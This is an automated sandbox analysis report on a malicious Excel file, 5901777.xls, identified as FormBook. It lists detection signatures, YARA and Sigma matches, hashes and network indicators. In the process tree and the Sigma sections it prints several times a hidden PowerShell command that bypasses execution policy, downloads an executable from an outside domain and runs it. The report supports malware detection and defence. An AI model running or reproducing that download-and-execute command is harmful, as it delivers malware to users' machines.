Analysis Report 5901777.xls

Overview

General Information

Sample Name: 5901777.xls
Analysis ID: 323692
MD5: 899e5af08f0794f0131adbf03f841045
SHA1: 242508434986d472b0b83387ec8d5d33888baa29
SHA256: 74b115a8b1f4e18d26b092dc965b60ad94dba931591d9913db219823d294904a
Tags: xls

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected FormBook
Bypasses PowerShell execution policy
Creates processes via WMI
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5988 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • splwow64.exe (PID: 3636 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
  • powershell.exe (PID: 5164 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • oftmhayq.exe (PID: 5540 cmdline: 'C:\Users\Public\oftmhayq.exe' MD5: 7E26E87AB642008D934824D509559859)
      • oftmhayq.exe (PID: 2344 cmdline: C:\Users\Public\oftmhayq.exe MD5: 7E26E87AB642008D934824D509559859)
  • powershell.exe (PID: 5184 cmdline: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • oftmhayq.exe (PID: 4000 cmdline: 'C:\Users\Public\oftmhayq.exe' MD5: 7E26E87AB642008D934824D509559859)
      • oftmhayq.exe (PID: 3708 cmdline: C:\Users\Public\oftmhayq.exe MD5: 7E26E87AB642008D934824D509559859)
        • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • vlc.exe (PID: 3476 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe' MD5: 7E26E87AB642008D934824D509559859)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Source: 5901777.xls | Rule: PowerShell_in_Word_Doc | Description: Detects a powershell and bypass keyword in a Word document | Author: Florian Roth
  • 0x30b17:$s1: powershell.exe
  • 0x30b4b:$s2: Bypass

Memory Dumps

Source | Rule | Description | Author | Strings
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
Source: 30.2.oftmhayq.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 30.2.oftmhayq.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 30.2.oftmhayq.exe.400000.0.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
Source: 29.2.oftmhayq.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 29.2.oftmhayq.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Executables Started in Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\oftmhayq.exe', CommandLine: 'C:\Users\Public\oftmhayq.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\oftmhayq.exe, NewProcessName: C:\Users\Public\oftmhayq.exe, OriginalFileName: C:\Users\Public\oftmhayq.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5164, ProcessCommandLine: 'C:\Users\Public\oftmhayq.exe', ProcessId: 5540
Sigma detected: Execution in Non-Executable Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\oftmhayq.exe', CommandLine: 'C:\Users\Public\oftmhayq.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\oftmhayq.exe, NewProcessName: C:\Users\Public\oftmhayq.exe, OriginalFileName: C:\Users\Public\oftmhayq.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5164, ProcessCommandLine: 'C:\Users\Public\oftmhayq.exe', ProcessId: 5540
Sigma detected: Suspicious Program Location Process Starts
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\oftmhayq.exe', CommandLine: 'C:\Users\Public\oftmhayq.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\oftmhayq.exe, NewProcessName: C:\Users\Public\oftmhayq.exe, OriginalFileName: C:\Users\Public\oftmhayq.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5164, ProcessCommandLine: 'C:\Users\Public\oftmhayq.exe', ProcessId: 5540

Signature Overview


AV Detection:

Antivirus detection for dropped file
Source: C:\Users\Public\oftmhayq.exe, Avira: detection malicious, Label: HEUR/AGEN.1136389
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, Avira: detection malicious, Label: HEUR/AGEN.1136389
Multi AV Scanner detection for domain / URL
Source: sparepartiran.com, Virustotal: Detection: 10%
Source: http://sparepartiran.com, Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: 5901777.xls, Virustotal: Detection: 23%
Yara detected FormBook
Source: Yara match, File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\oftmhayq.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, Joe Sandbox ML: detected
Source: 30.2.oftmhayq.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.2.oftmhayq.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: global traffic, DNS query: name: sparepartiran.com
Source: global traffic, TCP traffic: 192.168.2.3:49743 -> 162.223.88.131:80
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK, Date: Fri, 27 Nov 2020 10:38:08 GMT, Server: Apache, Last-Modified: Fri, 27 Nov 2020 09:07:10 GMT, Accept-Ranges: bytes, Content-Length: 552960, Keep-Alive: timeout=5, max=100, Connection: Keep-Alive, Content-Type: application/x-msdownload
Source: Joe Sandbox View, IP Address: 162.223.88.131
Source: Joe Sandbox View, ASN Name: COLOUPUS
Source: global traffic, HTTP traffic detected: GET /js/2Q/5901777.pdf.exe HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1, Host: sparepartiran.com, Connection: Keep-Alive
Source: unknown, DNS traffic detected: queries for: sparepartiran.com
Source: powershell.exe, 00000014.00000002.416291005.000001D20A361000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.443905156.000001F6E4B80000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512239339.0000000008A14000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: oftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmp, String found in binary or memory: http://en.wikip
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.421069642.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: powershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000014.00000002.417757866.000001D20A471000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.425672375.000001F6CC491000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000014.00000002.434703367.000001D20B78E000.00000004.00000001.sdmp, String found in binary or memory: http://sparepartiran.c
Source: powershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.431327100.000001F6CD016000.00000004.00000001.sdmp, String found in binary or memory: http://sparepartiran.com
Source: powershell.exe, 00000015.00000002.433516174.000001F6CD269000.00000004.00000001.sdmp, String found in binary or memory: http://sparepartiran.com/js/2Q/5
Source: powershell.exe, 00000015.00000002.437681363.000001F6CD8C3000.00000004.00000001.sdmp, String found in binary or memory: http://sparepartiran.com/js/2Q/5901777.pdf.exe
Source: powershell.exe, 00000014.00000002.421247257.000001D20A682000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp, String found in binary or memory: http://sparepartiran.com/js/2Q/5901777.pdf.exe0yRO
Source: powershell.exe, 00000014.00000002.417383854.000001D20A3F4000.00000004.00000001.sdmp, String found in binary or memory: http://sparepartiran.com/js/2Q/5901777.pdf.exeers
Source: powershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmp, String found in binary or memory: http://sparepartiran.comx
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmp, String found in binary or memory: http://www.ascendercorp.com/typedesigners.html:
Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.com
Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.comR
Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.comegu
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: oftmhayq.exe, 00000018.00000003.428462060.0000000005A6B000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/O
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: oftmhayq.exe, 00000018.00000003.429554152.0000000005A6B000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlj
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG6
Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.coma77
Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comldva
Source: oftmhayq.exe, 00000018.00000003.419516812.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.419609379.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: oftmhayq.exe, 00000018.00000003.419447690.0000000005A6D000.00000004.00000001.sdmp, String found in binary or memory: http://www.fonts.comat
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: oftmhayq.exe, 00000018.00000003.424365835.0000000005A38000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: oftmhayq.exe, 00000018.00000003.424456304.0000000005A37000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cnn-u
Source: oftmhayq.exe, 00000018.00000003.423993163.0000000005A37000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cnp
Source: oftmhayq.exe, 00000019.00000003.431627701.00000000063CD000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.431695720.00000000063CD000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/I7s
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Kurst7D
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/S7
          Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: oftmhayq.exe, 00000019.00000003.434710127.00000000063F1000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.comc
          Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.como
